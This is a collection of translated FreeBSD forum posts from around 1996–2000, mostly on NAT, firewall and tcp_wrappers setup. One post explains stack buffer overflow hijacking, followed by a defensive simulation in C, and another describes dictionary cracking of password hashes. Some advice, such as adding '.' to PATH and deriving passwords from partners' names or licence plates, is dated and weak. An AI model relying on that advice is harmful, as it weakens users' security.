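FreeBSD Information Network

System Security - Security

Explaining the term: what is a buffer overflow
How do I make sure the ISO file I downloaded is correct!
A question about ./
Broken into by a hacker
A question about monitoring
A question about SNP
How do I view a USER's password?
natd address translation service still fails!!...
NAT + DHCP SERVER
natd address translation service still fails!!...
Can a PC behind natd run battle.net and netmeeting?..
How to do IP mapping under NAT + FIREWALL
natd problem...
Blocking telnet??
A question about NAT translation on freebsd????
How to use the advanced features of NAT???
A question about NAT redirect...
The natd puzzle... seniors, please enlighten me!!!
test nat fail
Hmm, the system seems to have been cracked...
Has the way NAT is done changed in 4.2-RELEASE??
IPFW has confused my understanding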






Explaining the term: what is a buffer overflow



--------------------------------------------------------------------------------



Author: tmg (海邊漂來的..海嘯)  Board: SobVersion
Title: Explaining the term: what is a buffer overflow
Time: Wed Nov 13 20:50:24 1996

Sigh....... the buffer overflow hole is probably the hardest hole of all to guard against,
because the cause of this hole is purely a bug in the program,
and it is the kind of bug that you and I make every now and then; it is very hard to guard against while coding.
The only way to prevent this kind of hole is to check the code very, very carefully........



As the name suggests, this kind of hole achieves its goal by using the principle of buffer overflow......
For example, an array has only 100 bytes, but I feed it 200 bytes of data,
so the array cannot hold the data, and that causes an overflow......



Why does an overflow become a security hole?
First, when an overflow happens, the extra data covers other variables;
I believe everyone already knows that.

The question is: when the data covers other variables, at most the program runs incorrectly;
is that serious enough to become a security problem? This is where the fun begins.......



When we call a function, from the assembly-language point of view,
the return address is pushed onto the stack.
If the function declares some local variables,
then on entering the function another area of the stack is set aside for those local variables,
and when the function is about to return, those local variables on the stack are cleaned off.

Now then, this is exactly where the buffer overflow security hole happens.......

Suppose some function declares a local array, such as:



int func() {
  int i, j, k;
  char buf[16];
  struct abc *x, *y, *z;
  /* ... */
}



At this point, when this function is called, the stack looks like this:



                               +-----------------------+
current stack pointer ---->    | (other variable)      |
                               +-----------------------+
                               | buf (16 bytes)        |
                               +-----------------------+
                               | (other variable)      |
                               +-----------------------+
                               | some system data      |
                               +-----------------------+
                               | return address of     |
                               | this function         |
                               +-----------------------+
                               | (other data in stack) |
                               |           .           |
                               |           .           |
                               |           .           |



Hmm..... now it is obvious: if there is a bug inside this function and it forgets to control
the length of the data fed to buf, then..... when I feed it slightly longer data, I can cover this
function's return address..........

At that point, while feeding data to buf, I also feed in the machine code I want to run,
and when the data reaches the function's return address, I point the return address
at the code I fed in......
Then, when the function finishes and is about to return, heh heh heh,
it does not return to the place that originally called it, but "returns" to the code I fed in...
At that point I can do whatever I like....... however I feel like doing it..........



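This is really a bit scary, because this kind of hole is purely the "carelessness" of the program's developers;
no matter how well the system is administered, once you use a program like this, it is the same as opening a hole.......
There are quite a few programs with this kind of hole, for example the early fingerd, sendmail 8.6.xxx, Xt...... and so on.....
When you run into this problem, besides quickly getting the new version of the program to compile,
you also have to pray that no hacker came through this hole before you discovered it........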

.
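The frame layout described in this post, as an added example (not part of the original post): a C model that places buf[16], the neighbouring data and the saved return address in one byte array, then compares an unchecked copy with a length-checked one. The 8-byte gap, the 8-byte return slot and the sample address are assumptions made for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of func()'s stack frame from the diagram, lowest address first.
 * Every size other than buf[16] is constructed for this example. */
enum {
    BUF_OFF   = 0,   /* char buf[16]                              */
    BUF_LEN   = 16,
    OTHER_OFF = 16,  /* "(other variable)" and "some system data" */
    OTHER_LEN = 8,
    RET_OFF   = 24,  /* "return address of this function"         */
    RET_LEN   = 8,
    FRAME_LEN = 32
};

#define SAVED_RET UINT64_C(0x0000000000401136) /* constructed sample value */

static void frame_init(unsigned char *frame)
{
    uint64_t ret = SAVED_RET;
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + RET_OFF, &ret, RET_LEN);
}

static uint64_t frame_ret(const unsigned char *frame)
{
    uint64_t ret;
    memcpy(&ret, frame + RET_OFF, RET_LEN);
    return ret;
}

/* The bug the post describes: the length of the data fed to buf is never
 * compared with the size of buf. The clamp to FRAME_LEN only keeps this
 * model inside its own array; a real stack has no such limit. */
static void fill_unchecked(unsigned char *frame, const unsigned char *data, size_t n)
{
    if (n > (size_t)FRAME_LEN)
        n = FRAME_LEN;
    memcpy(frame + BUF_OFF, data, n);
}

/* The fix: refuse input that does not fit in buf.
 * Returns 0 if the data was copied, -1 if it was rejected. */
static int fill_checked(unsigned char *frame, const unsigned char *data, size_t n)
{
    if (n > (size_t)BUF_LEN)
        return -1;
    memcpy(frame + BUF_OFF, data, n);
    return 0;
}

/* Returns 1 if an unchecked copy of n bytes changes the saved return address. */
int unchecked_clobbers_ret(size_t n)
{
    unsigned char frame[FRAME_LEN], input[FRAME_LEN];
    memset(input, 'A', sizeof input);
    frame_init(frame);
    fill_unchecked(frame, input, n);
    return frame_ret(frame) != SAVED_RET;
}

/* Returns fill_checked()'s status, or 2 if the return address changed anyway. */
int checked_result(size_t n)
{
    unsigned char frame[FRAME_LEN], input[FRAME_LEN];
    int rc;
    memset(input, 'A', sizeof input);
    frame_init(frame);
    rc = fill_checked(frame, input, n);
    return frame_ret(frame) == SAVED_RET ? rc : 2;
}

int main(void)
{
    size_t sizes[] = { 16, 24, 25, 32, 200 };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("n=%3zu unchecked: ret %s | checked: %s\n", sizes[i],
               unchecked_clobbers_ret(sizes[i]) ? "OVERWRITTEN" : "intact",
               checked_result(sizes[i]) == 0 ? "copied" : "rejected");
    return 0;
}
```

Input up to 24 bytes only damages the neighbouring variables in this model; the 25th byte is the first one that lands on the saved return address.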









How do I make sure the ISO file I downloaded is correct!

 

--------------------------------------------------------------------------------



※ Quoting chuyow@ms24.hinet.net (chuyow):
> I recently downloaded 4.0-install.iso from freebsd.csie.nctu.edu.tw, and in the same directory there is also a
> checksum.md5. How do I go about verifying it!
>                                               FreeBSD newbie
  Use md5 to check: if the output of md5 4.0-install.iso is the same as the checksum, the file has no errors.
--
※ Origin: 網路邊攤 [linux.twbbs.org]
◆ From: cnpa-1.admin.yzu.edu.tw









A question about ./

 

--------------------------------------------------------------------------------



※ Quoting chiueh.bbs@bbs.cs.nthu.edu.tw (hahahhaa):
> I just finished installing FreeBSD and Maplebbs,
> but I found that every executable has to have ./ in front of it before it will run.
> Can someone teach me how to get rid of this behaviour!!
> please!!

This is a security consideration. If you really want to do this, put the following in your .cshrc or the
relevant file:



set path = ($path . )



--


※ Origin: 小鹿鹿 (Deer.abpe.org) From: infomath.math.nctu.edu.tw









Broken into by a hacker

 

--------------------------------------------------------------------------------



On Fri, Jun 09, 2000 at 04:00:32AM +0000, tsguu@ms1.hinet.net wrote:

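> Our web pages were broken into by some hacker a few days ago, but he only replaced the home page and did nothing else.
> Our host is a 486DX-50 with 32Mb, and the system is FreeBSD 2.2.8 stable; I do not want to change the system
> to 3.x or 4.x. What should I pay attention to?
netstat -afinet | grep LISTEN
See how many there are, and turn off the ones you do not need ..
(er, no need to post the results to the board)

or, if it is only used as a web server, you might as well keep only httpd and sshd.
Do not open sshd to everyone; allow only certain machines to log in.

If you have a lot of time, you could perhaps take a look at an article I translated a long time ago: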

http://water.ite.ntnu.edu.tw/doc/cfbhow2.txt



--

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38.

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v' .a. CirX.









A question about monitoring

 

--------------------------------------------------------------------------------



《 In the post by skyo.bbs@mis.mgt.ncu.edu.tw (^-^Y): 》
: ※ Quoting charme.bbs@bbs.cs.nthu.edu.tw (Dangerous):
: :         Suppose the system is broken into:
: :         how do we record what the intruder did and which files were touched?
: :         And if I, the system administrator, happen to be online
: :         and do not kill the intruder's process, how do I track what the intruder is doing right now?
: Add the line accounting_enable="YES" to rc.conf, and you can use lastcomm
: to see the commands everyone has used.
: tty snoop lets you track what the intruder is doing right now.
: The method is:
:         1. Add to the kernel configuration
:            pseudo-device   snp     3  #Snoop device - to look at pty/vty/etc..
:            and reinstall the kernel.
:         2. In /dev, run ./MAKEDEV snp3
:         3. After that you can monitor with the watch command, e.g. watch ttyp2.

:   Uh... I did that.. and rebooted after building the kernel too....
:   watch ttyp0 still gives watch: fatal: cannot open snoop device



# cd /dev

# ./MAKEDEV snp0 snp1 snp2



     man watch



     (control-G)

           Exit watch.

     (control-W)

           Clear screen.

     (control-X)

           Change attached tty.

           

--

※ Source: ‧蛋捲廣場 bbs.tku.edu.tw‧[FROM: 163.13.240.20]









A question about SNP

 

--------------------------------------------------------------------------------



On Sun, Jun 25, 2000 at 05:28:17PM +0000, 天上飛的 wrote:
>
> In the installation notes for snp0.91, in etc-example/services, I saw this section...
> It looks a bit odd to me...
> I looked in my /usr/local/libexec/
> and there is no tcpd....
Yeah, get rid of /usr/local/libexec/tcpd.. for example in vi[m] just

:%s,/usr/local/libexec/tcpd,,g



> Is that the main reason the connection drops every time ptelnet connects in?
> Is it a problem with my BSD version?
> Also, I do not know how to solve it...
Ask csie.nctu to link with -lwrap directly?
That way you can use /etc/hosts.allow directly...

> Thanks!

> FreeBSD 3.4 Release

>

> ptelnet  stream  tcp  nowait  root  /usr/local/libexec/tcpd /usr/local/snp/libexec/ptelnetd
> prlogin  stream  tcp  nowait  root  /usr/local/libexec/tcpd /usr/local/snp/libexec/prlogind
> pftp     stream  tcp  nowait  root  /usr/local/libexec/tcpd /usr/local/snp/libexec/pftpd
> ppasswd  stream  tcp  nowait  root  /usr/local/libexec/tcpd /usr/local/snp/libexec/ppwdd

>



--

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38.

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v' .a. CirX.









How do I view a USER's password?

 

--------------------------------------------------------------------------------



刴X (slime.bbs@tropic.med.kmu.edu.tw) wrote in message

news:3b9OPM$WqB@tropic.med.kmu.edu.tw...

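> ※ Quoting adimit.bbs@bbs.cs.nthu.edu.tw (Comealittlecloser):
> : As I recall, can't you choose whether or not to shadow the passwords?
> : As long as you are root you have permission to see all of them, right? ^^;
> Do you mean shadow?
> Without shadow installed they are kept in /etc/passwd ,
> with shadow installed they are kept in /etc/shadow instead,
> but wherever they are kept.... they are all "encoded" passwords.
> Even if you can see them, it is very hard to work backwards.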





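Although Linux passwords are encrypted with a one-way hash,
so working backwards from them is very hard,

you can still enter passwords one by one and see whether the encrypted result matches what is in the file, and so find out whether it is the original password.

This method is the well-known dictionary attack and brute-force attack.

So setting a strong, hard-to-guess password is very important for security:
1. The password should preferably be on the long side.
(In MS Windows the password length is either 7 or 14. There is a reason for this: for compatibility with earlier systems, MS Windows password encryption still keeps the encryption method of the LanMAN era, which works in units of 7 characters; if the password is not long enough, it is padded at the end with 0 (or some other number, I forget). If it is longer than 7, a second unit is used. As a result the padded part is very easy to crack (because it is a run of consecutive characters), and the remaining part of that unit is limited in length, so cracking it is relatively easy too. If the password guessed from the second unit is: FT01, then trying MICROSO as a guess for the first unit should be very easy.)
2. Do not use ready-made words as passwords; the example just now is an excellent teaching example.
3. The password should preferably combine upper-case and lower-case letters, digits and symbols.
4. Change the password regularly.
5. Do not reuse earlier passwords.

Now, friends may feel that such passwords are easy to forget.

The solution is to take some names and numbers that you know and that others would find hard to guess as a "seed", and make the password by transforming them.
For example, you can take the name of your boyfriend or girlfriend, plus his birthday or the date you first met, as the seed; then drop the second or third letter of his name, make the last letter upper case, add a rarely used symbol (such as ^, >, [, and so on), and then append those digits. That gives a password that is very hard to guess, yet not easy for you to forget. Of course, besides boyfriends and girlfriends, you can also use the names of parents, children, pets and so on as the seed of the password.

Also, I have found that using a motorcycle or car licence plate as a password is not bad either; changing one of the English letters to lower case already meets the company's requirements. If you want to be even fussier, shifting those letters and digits forward by 1 or 2 in sequence is also a good idea. For example, if your motorcycle plate number is LU-5240, you can change it to mV-6351, which is a password that "barely (because it has too many digits)" meets the requirements.

There are plenty of methods; it just has to be easy for you to remember and hard for others to guess. Do not think that a run of consecutive keys such as "QWERTY6789", or writing your own name backwards, is a good idea; experienced crackers saw through those tricks long ago.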





--

======= http://go.to/study-area =======









natd address translation service still fails!!...

 

--------------------------------------------------------------------------------



Frank Millers (fjj.bbs@vlsi1.iie.ncku.edu.tw) wrote:

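> External side ed0: 1.2.3.4
> Internal side ed1: 192.168.1.1
> A Natd server is set up internally, along with a DNS Server
> At present the whole company goes online smoothly using this FreeBSD machine as the Gateway....
> Previously, the company used virtual hosting provided by the ISP.... as its web server
> Now the company wants to bring it back in-house and set up its own web server
> so we added a Windows 2000+IIS 5.0 machine, IP address 192.168.1.2 ,
> with Gateway set to 192.168.1.1 (that is, the FreeBSD machine)
> My /etc/rc.firewall has been corrected following your instructions!!...
> Also, I do not know what command to give natd??..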



1. Apart from divert, do not have any other ipfw rules for now, for example:
   0000 divert 8668 ip from any to any via ed0
   0100 allow ip from any to any
   This rules out the case where the ipfw rules are not set up properly.

2. Run by hand: /sbin/natd -interface ed0 -log -v -same_ports
   -redirect_port tcp 192.168.1.2:80 80
   natd will then run in the foreground and list every address translation it performs; look carefully at
   what it does for port 80.

3. Try telnet 1.2.3.4 80 from outside; if it does not work, check
   a) whether natd is correctly changing x.x.x.x:port->1.2.3.4:80 into
      x.x.x.x:port->192.168.1.2:80
   b) if it is, find a UNIX machine on the LAN and use tcpdump port 80
      to see whether 192.168.1.2 is replying with packets correctly, for example:
      x.x.x.x:4321->192.168.1.2:80
      192.168.1.2:80->x.x.x.x:4321
   c) note that the reply packets from 192.168.1.2 must also go through 1.2.3.4, otherwise it may
      end up like this:
      x.x.x.x:4321->192.168.1.2:80  (arrived via 1.2.3.4)
      192.168.1.2:80->x.x.x.x:5678  (not sent back via 1.2.3.4)
      Then x.x.x.x finds it strange: it clearly sent from port 4321, so why is
      an inexplicable packet arriving at port 5678, where no program is listening? It gets dropped.



-- 



                                          §õ «Ø ¹F (Jian-Da Li) !(¥æ¤j¸ê¤u)

                                          E-Mail :  (jdli@csie.nctu.edu.tw)

                                          http://jdli.tw.freebsd.org/









NAT + DHCP SERVER

 

--------------------------------------------------------------------------------



※ Quoting right.bbs@right.dorm-gd2.nctu.edu.tw (快樂陽光老地方對先生):
> ※ Quoting Capacitor.bbs@openbazaar.net (~):
> :   dhcp + nat is no problem, that is exactly how I do it...
> My natd and dhcp each run fine separately
> The question is how to get the two to run together?

  Then just run them together!

  Remember that it is better to start natd before dhcpd...

  I used to run dhclient + natd + dhcpd together with Cable ...
--
※ Origin: 網路邊攤 (linux.twbbs.org)
◆ From: ms6.hinet.net









natd address translation service still fails!!...

 

--------------------------------------------------------------------------------



※ Quoting fjj.bbs@vlsi1.iie.ncku.edu.tw (Frank Millers):
: Senior Jian-Da:
:     First of all, thank you for your reply. I followed your method..... but I still cannot redirect the IP...
: So... I am asking you for advice once more....
: and I describe my environment below as well!!....
: My company applied to Chunghwa Telecom for a 128K leased line... the IP addresses allocated are as follows
: 1.2.3.XXX, 255 IPs available in total... Net mask is 255.255.255.0
: Internal IPs use 192.168.1.XXX, 255 in total, Netmask is 255.255.255.0
: The Router is configured through an IBM console...
: LAN side: one FreeBSD machine fitted with two D-Link DE220 network cards...
: External side ed0: 1.2.3.4
: Internal side ed1: 192.168.1.1
: A Natd server is set up internally, along with a DNS Server
: At present the whole company goes online smoothly using this FreeBSD machine as the Gateway....
: Previously, the company used virtual hosting provided by the ISP.... as its web server
: Now the company wants to bring it back in-house and set up its own web server
: so we added a Windows 2000+IIS 5.0 machine, IP address 192.168.1.2 ,
: with Gateway set to 192.168.1.1 (that is, the FreeBSD machine)
: My /etc/rc.firewall has been corrected following your instructions!!...
: Also, I do not know what command to give natd??..
: So I would like to ask for your advice.... I hope you can give me a pointer or two...
: Thank you again for your help.....

I have not used natd for a long time. You might as well switch to ipnat from ipfilter for the translation: simple and clear, with easy-to-understand syntax :)
1. Add to the kernel
   options         IPFILTER                #ipfilter support
   options         IPFILTER_LOG            #ipfilter logging
   Since it is bound into the kernel, there is no need to worry about a daemon dying

2. Add to /etc/rc.conf
gateway_enable="YES"            # Set to YES if this host will be a gateway.

3. Create the ipnat configuration file /etc/ipnat.conf
# Forward packets arriving from outside on ed0 for 1.2.3.4:80 to 192.168.1.2:80
rdr ed0 1.2.3.4 port www -> 192.168.1.2 port www
# Map packets from internal 192.168.1.0/24 to 1.2.3.4/32 so the outside can understand them
map ed0 192.168.1.0/24 -> 1.2.3.4/32
# or map ed0 192.168.1.0/24 -> 1.2.3.4/32 portmap tcp 10000:20000

4. If I have not left anything out, finally run ipnat -CF -f /etc/ipnat.conf and it should be ok
PS: for ftp from the inside, use PASV MODE

The above is the simplest case: it "only" lets one machine be translated out :P


To make good use of an external CLASS C of IPs, you can use ip aliases
Add to /etc/rc.conf
ifconfig_ed0_alias0="inet 1.2.3.1  netmask 0xffffffff"
ifconfig_ed0_alias1="inet 1.2.3.2  netmask 0xffffffff"
...

MAIL Server receiving mail
/etc/ipnat.conf
# Map internal 192.168.1.3 to 1.2.3.1 to receive mail
rdr ed0 1.2.3.1/32 port smtp -> 192.168.1.3 port smtp

FTP Server
# Map internal 192.168.1.4 to 1.2.3.2 to offer FTP
rdr ed0 1.2.3.2/32 port 21 -> 192.168.1.4 port 21

.. and so on by analogy; redirect however you like :p
After changing the configuration, just run ipnat -CF -f /etc/ipnat.conf once more
But as with ipfw, pay attention to the order; it is likewise first win

You can also combine it with squid as a transparent proxy to economise and save bandwidth :)
Add to squid.conf
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy  on
httpd_accel_uses_host_header on
# PS. This way you can no longer run www

## TransParent Proxy
rdr ed1 0.0.0.0/0 port www -> 127.0.0.1 port 3128

Also, if there are many internal computers, I suggest replacing the edX network cards with fxpX ones; it will be much more stable

References:
Command usage -> man ipnat
Configuration file -> man 5 ipnat
Author's website
http://coombs.anu.edu.au/~avalon/ip-filter.html
More examples
http://coombs.anu.edu.au/~avalon/examples.html#NAT

If you run into problems, please discuss them on the board and do not reply to this mailbox; it is used only for idle posting and collecting spam :Q



Copyright (C) 2000 , By Yi-Hsiang Lin, All Right Reserved.



--




--

※ Post by test from Free.NHCTC.edu.tw ...









Can a PC behind natd run battle.net and netmeeting?..

 

--------------------------------------------------------------------------------



※ Quoting mchang@3tec.com (Mike Chang):
> You can enable Samba's WINS support, and then on all the workstations set
> the WINS Server to the IP of your FreeBSD machine. smb.conf should contain:
>     interfaces = 192.168.1.0/24 192.168.2.0/24
>     wins support = yes
>     wins proxy = yes  # making some old systems happy
> On the Windows workstations, go to the network settings in the Control Panel and add 192.168.1.1 (example)
> to the WINS search order, and that is it.
> Although NetBIOS can cross different network domains over TCP/IP (NetBIOS over TCP/IP, NetBT or NBT for short),
> NBT uses broadcast to search for hosts, so it is
> not suitable for large networks, and the great majority of routers block NetBIOS packets
> to cut down on unnecessary waste of bandwidth.
:Thank you very much for your guidance.....:)...
:I cannot thank you enough.... may I ask one last question?...
:So.. is there a way to send the IPX protocol through FreeBSD as well??



Add to the kernel:

    options    IPX

Enable in /etc/defaults/rc.conf:

    ifconfig_fxp0_ipx="ipx 0x101"
    ifconfig_fxp1_ipx="ipx 0x102"
    ipxgateway_enable="YES"
    ipxrouted_enable="YES"
    ipxrouted_flags=""

and that is it.

It is worth mentioning that in the FreeBSD 3.x family, ipxrouted can only support the Ethernet_II
frame type, but FreeBSD-3.4 has a patch that lets the Ethernet_802.2 and
Ethernet_802.3 frame types be forwarded under ipxrouted. ipxrouted in FreeBSD-4.0 and later
versions supports all of these frame types.





--

※ Origin: 雲淡風清 (bbs.au.edu.tw)
◆ From: 211.75.7.180









How to do IP mapping under NAT + FIREWALL

 

--------------------------------------------------------------------------------



Try doing it this way:

/etc/rc.conf
ifconfig_rl0="inet 140.113.10.x netmask 255.255.255.0"
ifconfig_rl0_alias0="inet 140.113.10.1 netmask 255.255.255.0"
ifconfig_rl0_alias1="inet 140.113.10.2 netmask 255.255.255.0"
ifconfig_rl1="inet 192.168.1.254 netmask 255.255.255.0"
firewall_enable="YES"
firewall_type="OPEN"  <- can be omitted if the kernel already has ipfirewall_default_to accept
natd_enable="NO"

/etc/natd.conf
use_sockets
unregistered_only
redirect_address 192.168.1.1 140.113.10.1
redirect_address 192.168.1.2 140.113.10.2

/etc/rc.local
/sbin/route change -host 140.113.10.1 192.168.1.254
/sbin/route change -host 140.113.10.2 192.168.1.254
/sbin/ipfw add 1 divert natd ip from any to any via 140.113.10.x
/sbin/ipfw add 2 divert natd ip from any to any
/sbin/ipfw add 3 divert natd ip from any to any via 192.168.1.1
/sbin/ipfw add 4 divert natd ip from any to any via 192.168.1.2
/sbin/natd -a 140.113.10.x -f /etc/natd.conf



restart your host and enjoy !!



yyriver (lobin@mail2000.com.tw) wrote in message

news:8pdj12$2qrh$1@ftp.ntu.edu.tw...

> On FREEBSD 4.1R I have already finished setting up nat and firewall
> If I want to map assigned real ips to private ips, how should I do it
> such as

> 140.113.10.1  -->  192.168.1.1

> 140.113.10.2  -->  192.168.1.2

>

>

>









natd problem...

 

--------------------------------------------------------------------------------



On Thu, Sep 28, 2000 at 06:29:48PM +0000, Over Time wrote:

> I can only telnet to 192.168.1.254 (the gateway I set up) and then connect out from there...
> but I cannot connect to machines outside...
> Result of running ipfw -a show
> 65000  797 141116 divert 8668 ip from any to any via ed0
> 65100 2048 312263 allow ip from any to any
> 65535   11   1040 deny ip from any to any
> Running netstat -nr

> Destination        Gateway            Flags     Refs     Use     Netif Expire

> default            210.244.71.254     UGSc        4        8      ed0

> 127.0.0.1          127.0.0.1          UH          0        2      lo0

> 192.168.1          link#1             UC          0        0      vr0

> 192.168.1.1        0:80:c8:c2:6b:ff   UHLW        3      692      vr0    787

> 210.244.70/23      link#2             UC          0        0      ed0

> 210.244.70.106     0:80:c8:10:ee:7f   UHLW        0      426      ed0     82

> 210.244.71.254     0:d0:58:26:a8:54   UHLW        5        0      ed0   1199

> 

> Please help me see where the problem is... thanks...
sysctl -a | grep net.inet.ip.forwarding
Does it show 1 or 0 ?



-- 

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38 .

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v ' .a. CirX.









Blocking telnet??

 

--------------------------------------------------------------------------------



【 In the post by lucy.bbs@bbs.csie.nctu.edu.tw (¤p¥Õè): 】
: ※ Quoting yuppie.bbs@bbs.ee.ncu.edu.tw (不喜歡失望罷了):
: >     man inetd; using the -Ww options gives you the tcp_wrapper functionality.
: >     In other words, FreeBSD 4.X already has tcp_wrapper built into inetd.
: >     Unless your machine's telnet is not handled by inetd, it will certainly work.
: >     Just write /etc/hosts.allow directly; restarting inetd is the safer bet.
: >     Of course you can use ssh to modify /etc/hosts.allow
: >     if you have the root authority.
:     My /etc/hosts.allow (hosts.deny) has not been changed at all
:     but when, in /etc/rc.conf, I
:     changed inetd_flag="-l -R -w -W 1024"

        The order of your parameters is wrong...
        Try inetd_flag="-lwW -R 1024"

:     after the reboot, I could no longer log in remotely
:     I had to go to the console and remove the " -w -W " parameters before I could log in remotely...><
:     I do not know how to configure /etc/hosts.allow ><

      vi hosts.allow add

      sshd : ALL  : allow

      sshdfwd-X11 : ALL : allow

      

> ps -aux | grep "inetd"



root     118  0.0  0.3  1056  712  ??  Ss    1:00AM  0:00.01 inetd -lwW -R 1024



--









A question about NAT translation on freebsd????

 

--------------------------------------------------------------------------------



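【 In the post by khchen1.: 】
: A question for all you experts..
:          Where on the net is there documentation about setting up nat translation...
:            Please let me know..
:            Thanks, everyone.


0. I have two computers, one ip, adsl
One computer acts as the gateway with two network cards installed (ed0 ed1)
one external (163.13.97.44) and one internal (192.168.0.1)
The internal network card is connected directly over RJ45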



1./etc/rc.conf



saver="fire"

blanktime="300"

keyrate="fast"

network_interfaces="ed1 ed0 lo0"

ifconfig_ed0="inet 163.13.97.44  netmask 255.255.255.0"

ifconfig_ed1="inet 192.168.0.1 netmask 255.255.255.0"

defaultrouter="163.13.97.254"

hostname="ggg.test.tku.edu.tw"

gateway_enable="YES"

firewall_enable="YES"

natd_program="/sbin/natd"

natd_enable="YES"

natd_interface="ed0"





ps. when there is only one network card
   ifconfig_ed0="inet 163.13.97.44 netmask 255.255.255.0"
   ifconfig_ed0_alias0="inet 192.168.0.1 netmask 255.255.255.0"
                ~~~~~
             not sure whether I spelled this right~





2./etc/rc.firewall

/sbin/ipfw -f flush

/sbin/ipfw add divert natd all from any to any via ed0

/sbin/ipfw add pass all from any to any



3. You need to compile the kernel
  add options IPFIREWALL
      options IPDIVERT
4. When connecting network card to network card directly, remember to use a crossover cable





--



※ Source: ‧渡船頭之戀 bbs.im.tku.edu.tw‧[FROM: 211.21.92.23]









How to use the advanced features of NAT???

 

--------------------------------------------------------------------------------



《 In the post by seawolf.bbs@bbs.cs.nthu.edu.tw (海狼): 》
: ※ Quoting repsol.bbs@bbs.cs.nccu.edu.tw (小海於冷酷異境中):
: > When using the NAT function.... can I use three network cards,
: > one internal.... Private IP...192.168.x.x
: > two external.... the two external cards have Public IPs of different classes
: > Say one of the external cards is called vr0.... and the other vr1
: > Normally, for outbound traffic.... only one of the external cards (vr0) is used
: > If vr0 goes down.... vr1 can automatically take over the NAT function
: > In other words... the client side does not need to change its gateway....
: > and can go online through vr1 instead
: > Is this idea feasible.... and if so... how do I configure it
: > Many thanks....thanks a lot
: Are you trying to build a backup function??
: When the normal leased line goes down.. switch to the other leased line right away??
: My idea is to write two shell scripts
: The first one uses vr0 to ping the router on vr1
: and as soon as it finds the link is down, changes the natd interface to vr1
: and starts running the second shell script, which pings the router on vr0
: until it is reachable, then changes the nat interfaces back
: But I am trying to use dial-up as the backup... and so far it has not worked ... >_<
  Here is a script that has been written and tested; you can give it a try...



#!/bin/sh
gatewayP="163.13.1.254"
gatewayS="211.72.177.254"
# P = Primary , S = Secondary
active="P"
while [ 1 ]; do
  response="`/sbin/ping -c 1 $gatewayP | grep from`"
#  echo $active : $response
  if [ "$response" ]; then
    if [ "$active" = "S" ]; then
      route delete -net 0.0.0.0
      route add -net 0.0.0.0 -gateway $gatewayP
      active="P"
    fi
  else
    if [ "$active" = "P" ]; then
      route delete -net 0.0.0.0
      route add -net 0.0.0.0 -gateway $gatewayS
      active="S"
    fi
  fi
  sleep 1
done



--

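That is the backup concept.... my idea is to redirect some services ports to the other leased line (ex: port 80),
that is, to send the client side (requests from the private-IP side) out over the other leased line (the two leased lines are on different network segments).
Two leased lines on different segments on the same machine... doing natd... to share out some of the services port traffic...
and not let all the traffic squeeze into one leased line.
But........ this kind of configuration.... I do not know how to do  .....   :(
I hope you experts can help.... thanks

※ Source: ‧蛋捲廣場 bbs.tku.edu.tw‧[FROM: 163.13.91.163]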









A question about NAT redirect...

 

--------------------------------------------------------------------------------



※ Quoting SouthWind.bbs@bbs.cs.nthu.edu.tw (策略..):
: ※ Quoting jialin@bbs.ee.ntu.edu.tw (Åï¨à):
: >   1) give it another ip to be the address the internal ip is translated to...
: >   2) redirect using a different port.. e.g. 8080<->80, the original 80 can still be used...
: ------------------------------------------------------>>>
: An unreasonable request: could you give a real example of the parameters...
: I have tried several combinations of parameters, and none seems to achieve the expected result...
: Also, it should have nothing to do with my public IP being a DHCP dynamic IP, right???
: I have a correctly matching DN <-> IP ...
  /etc/rc.conf
  natd_flags="-f /etc/natd.conf"
  /etc/natd.conf
  redirect_port tcp server_ip:8080 local_server_ip:80
or (fixed ip, with another usable ip assigned)
  /etc/rc.conf
  ifconfig_vr0_alias0="inet 192.168.0.161 netmask 255.255.255.0"
  .
  .
  .
  natd_flags="-f /etc/natd.conf"
  /etc/natd.conf
  redirect_port tcp 192.168.0.161:80 local_server_ip:80
  redirect_port tcp 192.168.0.161:25 local_smtp_ip:25
  redirect_port tcp 192.168.0.161:110 local_pop3_ip:110
Only the natd part is listed... the rest should be fine...
Try it, and mail me if it does not work...

--

※ Origin: 臺大電機 Maxwell 站 ◆ From: 139.223.87.135









The natd puzzle... seniors, please enlighten me!!!

 

--------------------------------------------------------------------------------



"®ü¯T" (seawolf.bbs@bbs.cs.nthu.edu.tw) ¼¶¼g©ó¶l¥ó

news:3dK9Te$tGs@bbs.cs.nthu.edu.tw...

> ※ Quoting clive@CirX.ORG (Clive Lin):
> Let me ask from a different angle: if I add socket 4 to the ICQ or IRC client, these non-fixed-port transfers
> work normally, so how do I set up a socket 4 SERVER??

http://beta.wsl.sinica.edu.tw/~ylchang/Security/Firewall/Socks5.html

Something I wrote a while back (socks5 v1.0r10); the wording is not great, so take it for what it is worth :p

nec-socks5 now has a new version (v1.0r11); the source and patch are also placed
under ftp://ftp.se.ntou.edu.tw/pub/UNIX/SOCKS5/ .



------









test nat fail

 

--------------------------------------------------------------------------------



==> jamesHammer.bbs@bbs.cs.nthu.edu.tw (HUMAN.CPP DIE!!!!) wrote in the article:

fxp0 : external (Public)
fxp1 : internal

Just write these four lines in rc.firewall and delete everything else (mind the location of ipfw)
/sbin/ipfw -f flush
/sbin/ipfw add divert natd all from any to any via fxp0
/sbin/ipfw add pass all from any to any
/sbin/ipfw add 65534 allow all from any to any

From your rc.conf I can tell this line is already run at boot
>$natd -interface fxp0

In natd.conf write only the line below (if you do not need port redirect)
dynamic

After the change there is no need to reboot
Run natd -interface fxp0 and you can try it

>i has test my card .run fxp1 ping fxp0 can't ping .how can i do ??
>help!!!!
--
* Origin: 中山大學-美麗之島BBS * From: 211.20.155.138 [authenticated]



--------------------------------------------------------------------------



※ Quoting chuwei.bbs@bbs.nsysu.edu.tw (主委):
: ==> jamesHammer.bbs@bbs.cs.nthu.edu.tw (HUMAN.CPP DIE!!!!) wrote in the article:
: fxp0 : external (Public)
